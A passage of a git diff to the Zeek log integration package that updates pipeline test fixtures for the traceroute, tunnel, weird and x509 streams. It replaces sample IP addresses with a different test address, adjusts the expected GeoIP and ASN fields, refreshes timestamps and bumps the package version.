"{\"ts\":1476605878.714844,\"peer\":\"bro\",\"mem\":94,\"pkts_proc\":296,\"bytes_recv\":39674,\"events_proc\":723,\"events_queued\":728,\"active_tcp_conns\":1,\"active_udp_conns\":3,\"active_icmp_conns\":0,\"tcp_conns\":6,\"udp_conns\":36,\"icmp_conns\":2,\"timers\":797,\"active_timers\":38,\"files\":0,\"active_files\":0,\"dns_requests\":0,\"active_dns_requests\":0,\"reassem_tcp_size\":0,\"reassem_file_size\":0,\"reassem_frag_size\":0,\"reassem_unknown_size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "metric" diff --git a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log index 24ec750ea8f..f5ae4063423 100644 --- a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log +++ b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log @@ -1,2 +1,2 @@ -{"ts":1361916158.650605,"src":"192.168.1.1","dst":"8.8.8.8","proto":"udp"} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"8.8.8.8\",\"proto\":\"udp\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/traceroute.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1361916158.650605,"src":"192.168.1.1","dst":"89.160.20.156","proto":"udp"} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/traceroute.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json index 825d679c07a..0e2655f1e89 100644 --- a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json +++ b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json @@ -8,27 +8,30 @@ "related": { "ip": [ "192.168.1.1", - "8.8.8.8" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", - "ip": "8.8.8.8" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "zeek": {}, "source": { @@ -36,8 +39,8 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-08-11T19:18:42.556134300Z", - "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"8.8.8.8\",\"proto\":\"udp\"}", + "ingested": "2021-12-09T13:51:15.714980100Z", + "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}", "category": [ "network" ], @@ -62,22 +65,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", - "ip": "8.8.8.8" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "zeek": {}, "source": { @@ -97,15 +103,15 @@ "related": { "ip": [ "192.168.1.1", - "8.8.8.8" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:42.556146900Z", - "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"8.8.8.8\",\"proto\":\"udp\"}", + "ingested": "2021-12-09T13:51:15.714984Z", + "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}", "category": [ "network" ], diff --git a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log index a8d7a9cf884..1d3864e215f 100644 --- a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log +++ b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log @@ -1,2 +1,2 @@ -{"ts":1544405666.743509,"id.orig_h":"132.16.146.79","id.orig_p":0,"id.resp_h":"132.16.110.133","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1544405666.743509,\"id.orig_h\":\"132.16.146.79\",\"id.orig_p\":0,\"id.resp_h\":\"132.16.110.133\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/tunnel.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1544405666.743509,"id.orig_h":"89.160.20.156","id.orig_p":0,"id.resp_h":"89.160.20.156","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/tunnel.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json index f8b240e2aa7..72d89700b42 100644 --- a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json +++ b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json @@ -7,29 +7,31 @@ }, "related": { "ip": [ - "132.16.146.79", - "132.16.110.133" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 427, + "number": 29518, "organization": { - "name": "Air Force Systems Networking" + "name": "Bredband2 AB" } }, - "address": "132.16.110.133", + "address": "89.160.20.156", "port": 8080, - "ip": "132.16.110.133" + "ip": "89.160.20.156" }, "zeek": { "tunnel": { @@ -39,27 +41,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 427, + "number": 29518, "organization": { - "name": "Air Force Systems Networking" + "name": "Bredband2 AB" } }, - "address": "132.16.146.79", + "address": "89.160.20.156", "port": 0, - "ip": "132.16.146.79" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:42.999085700Z", - "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"132.16.146.79\",\"id.orig_p\":0,\"id.resp_h\":\"132.16.110.133\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", + "ingested": "2021-12-09T13:51:16.028946100Z", + "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "Tunnel::DISCOVER", @@ -82,23 +87,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 427, + "number": 29518, "organization": { - "name": "Air Force Systems Networking" + "name": "Bredband2 AB" } }, - "address": "132.16.110.133", + "address": "89.160.20.156", "port": 8080, - "ip": "132.16.110.133" + "ip": "89.160.20.156" }, "zeek": { "tunnel": { @@ -108,23 +116,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 427, + "number": 29518, "organization": { - "name": "Air Force Systems Networking" + "name": "Bredband2 AB" } }, - "address": "132.16.146.79", + "address": "89.160.20.156", "port": 0, - "ip": "132.16.146.79" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -135,16 +146,15 @@ }, "related": { "ip": [ - "132.16.146.79", - "132.16.110.133" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:42.999107700Z", - "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"132.16.146.79\",\"id.orig_p\":0,\"id.resp_h\":\"132.16.110.133\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", + "ingested": "2021-12-09T13:51:16.028954900Z", + "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "Tunnel::DISCOVER", diff --git a/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json b/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json index 3a0add4340c..519d8c92459 100644 --- a/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json +++ b/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json @@ -30,7 +30,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-08-11T19:18:43.448336Z", + "ingested": "2021-12-09T13:51:16.462556600Z", "original": "{\"ts\":1543877999.99354,\"uid\":\"C1ralPp062bkwWt4e\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":64521,\"id.resp_h\":\"192.168.1.2\",\"id.resp_p\":53,\"name\":\"dns_unmatched_reply\",\"notice\":false,\"peer\":\"worker-6\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -59,7 +59,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:43.448346500Z", + "ingested": "2021-12-09T13:51:16.462595Z", "original": "{\"ts\":1580227259.342809,\"name\":\"non_ip_packet_in_ethernet\",\"notice\":false,\"peer\":\"ens3f1-4\"}", "category": [ "network" @@ -115,7 +115,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:43.448353600Z", + "ingested": "2021-12-09T13:51:16.462601800Z", "original": "{\"ts\":1543877999.99354,\"uid\":\"C1ralPp062bkwWt4e\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":64521,\"id.resp_h\":\"192.168.1.2\",\"id.resp_p\":53,\"name\":\"dns_unmatched_reply\",\"notice\":false,\"peer\":\"worker-6\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json b/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json index 4337fac9cef..1d15735c259 100644 --- a/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json +++ b/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json @@ -210,7 +210,7 @@ "session_id": "FxZ6gZ3YR6vFlIocq3" }, "event": { - "ingested": "2021-08-11T19:18:43.816755500Z", + "ingested": "2021-12-09T13:51:16.805683700Z", "original": "{\"ts\":1543867200.143484,\"id\":\"FxZ6gZ3YR6vFlIocq3\",\"certificate.version\":3,\"certificate.serial\":\"2D00003299D7071DB7D1708A42000000003299\",\"certificate.subject\":\"CN=www.bing.com\",\"certificate.issuer\":\"CN=Microsoft IT TLS CA 5,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US\",\"certificate.not_valid_before\":1500572828.0,\"certificate.not_valid_after\":1562780828.0,\"certificate.key_alg\":\"rsaEncryption\",\"certificate.sig_alg\":\"sha256WithRSAEncryption\",\"certificate.key_type\":\"rsa\",\"certificate.key_length\":2048,\"certificate.exponent\":\"65537\",\"san.dns\":[\"www.bing.com\",\"dict.bing.com.cn\",\"*.platform.bing.com\",\"*.bing.com\",\"bing.com\",\"ieonline.microsoft.com\",\"*.windowssearch.com\",\"cn.ieonline.microsoft.com\",\"*.origin.bing.com\",\"*.mm.bing.net\",\"*.api.bing.com\",\"ecn.dev.virtualearth.net\",\"*.cn.bing.net\",\"*.cn.bing.com\",\"ssl-api.bing.com\",\"ssl-api.bing.net\",\"*.api.bing.net\",\"*.bingapis.com\",\"bingsandbox.com\",\"feedback.microsoft.com\",\"insertmedia.bing.office.net\",\"r.bat.bing.com\",\"*.r.bat.bing.com\",\"*.dict.bing.com.cn\",\"*.dict.bing.com\",\"*.ssl.bing.com\",\"*.appex.bing.com\",\"*.platform.cn.bing.com\",\"wp.m.bing.com\",\"*.m.bing.com\",\"global.bing.com\",\"windowssearch.com\",\"search.msn.com\",\"*.bingsandbox.com\",\"*.api.tiles.ditu.live.com\",\"*.ditu.live.com\",\"*.t0.tiles.ditu.live.com\",\"*.t1.tiles.ditu.live.com\",\"*.t2.tiles.ditu.live.com\",\"*.t3.tiles.ditu.live.com\",\"*.tiles.ditu.live.com\",\"3d.live.com\",\"api.search.live.com\",\"beta.search.live.com\",\"cnweb.search.live.com\",\"dev.live.com\",\"ditu.live.com\",\"farecast.live.com\",\"image.live.com\",\"images.live.com\",\"local.live.com.au\",\"localsearch.live.com\",\"ls4d.search.live.com\",\"mail.live.com\",\"mapindia.live.com\",\"local.live.com\",\"maps.live.com\",\"maps.live.com.au\",\"mindia.live.com\",\"news.live.com\",\"origin.cnweb.search.live.com\",\"preview.local.live.com\",\"search.live.com\",\"test.maps.live.com\",\"video.live.com\",\"videos.live.com\",\"virtualearth.live.com\",\"wap.live.com\",\"webmaster.live.com\",\"webmasters.live.com\",\"www.local.live.com.au\",\"www.maps.live.com.au\"]}", "id": "FxZ6gZ3YR6vFlIocq3", "type": [ @@ -441,7 +441,7 @@ "session_id": "FxZ6gZ3YR6vFlIocq3" }, "event": { - "ingested": "2021-08-11T19:18:43.816768700Z", + "ingested": "2021-12-09T13:51:16.805692200Z", "original": "{\"ts\":1543867200.143484,\"id\":\"FxZ6gZ3YR6vFlIocq3\",\"certificate.version\":3,\"certificate.serial\":\"2D00003299D7071DB7D1708A42000000003299\",\"certificate.subject\":\"CN=www.bing.com\",\"certificate.issuer\":\"CN=Microsoft IT TLS CA 5,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US\",\"certificate.not_valid_before\":1500572828.0,\"certificate.not_valid_after\":1562780828.0,\"certificate.key_alg\":\"rsaEncryption\",\"certificate.sig_alg\":\"sha256WithRSAEncryption\",\"certificate.key_type\":\"rsa\",\"certificate.key_length\":2048,\"certificate.exponent\":\"65537\",\"san.dns\":[\"www.bing.com\",\"dict.bing.com.cn\",\"*.platform.bing.com\",\"*.bing.com\",\"bing.com\",\"ieonline.microsoft.com\",\"*.windowssearch.com\",\"cn.ieonline.microsoft.com\",\"*.origin.bing.com\",\"*.mm.bing.net\",\"*.api.bing.com\",\"ecn.dev.virtualearth.net\",\"*.cn.bing.net\",\"*.cn.bing.com\",\"ssl-api.bing.com\",\"ssl-api.bing.net\",\"*.api.bing.net\",\"*.bingapis.com\",\"bingsandbox.com\",\"feedback.microsoft.com\",\"insertmedia.bing.office.net\",\"r.bat.bing.com\",\"*.r.bat.bing.com\",\"*.dict.bing.com.cn\",\"*.dict.bing.com\",\"*.ssl.bing.com\",\"*.appex.bing.com\",\"*.platform.cn.bing.com\",\"wp.m.bing.com\",\"*.m.bing.com\",\"global.bing.com\",\"windowssearch.com\",\"search.msn.com\",\"*.bingsandbox.com\",\"*.api.tiles.ditu.live.com\",\"*.ditu.live.com\",\"*.t0.tiles.ditu.live.com\",\"*.t1.tiles.ditu.live.com\",\"*.t2.tiles.ditu.live.com\",\"*.t3.tiles.ditu.live.com\",\"*.tiles.ditu.live.com\",\"3d.live.com\",\"api.search.live.com\",\"beta.search.live.com\",\"cnweb.search.live.com\",\"dev.live.com\",\"ditu.live.com\",\"farecast.live.com\",\"image.live.com\",\"images.live.com\",\"local.live.com.au\",\"localsearch.live.com\",\"ls4d.search.live.com\",\"mail.live.com\",\"mapindia.live.com\",\"local.live.com\",\"maps.live.com\",\"maps.live.com.au\",\"mindia.live.com\",\"news.live.com\",\"origin.cnweb.search.live.com\",\"preview.local.live.com\",\"search.live.com\",\"test.maps.live.com\",\"video.live.com\",\"videos.live.com\",\"virtualearth.live.com\",\"wap.live.com\",\"webmaster.live.com\",\"webmasters.live.com\",\"www.local.live.com.au\",\"www.maps.live.com.au\"]}", "id": "FxZ6gZ3YR6vFlIocq3", "type": [ diff --git a/packages/zeek/manifest.yml b/packages/zeek/manifest.yml index acf1bf38633..7b53a4ae2eb 100644 --- a/packages/zeek/manifest.yml +++ b/packages/zeek/manifest.yml @@ -1,6 +1,6 @@ name: zeek title: Zeek Logs -version: 1.5.0 +version: 1.5.1 release: ga description: Collect and parse logs from Zeek network security with Elastic Agent. type: integration